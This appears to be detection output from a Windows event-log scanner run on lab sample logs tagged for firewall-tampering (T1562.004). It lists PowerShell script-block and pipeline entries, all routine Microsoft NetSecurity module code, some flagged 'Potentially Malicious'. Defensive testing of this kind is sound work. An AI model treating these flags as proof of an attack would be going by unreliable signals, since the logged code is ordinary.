$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.329 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.330 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.330 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.331 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.331 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.331 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.332 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.332 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.333 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.381 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.386 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.386 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.387 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.418 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.418 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.419 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.419 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', 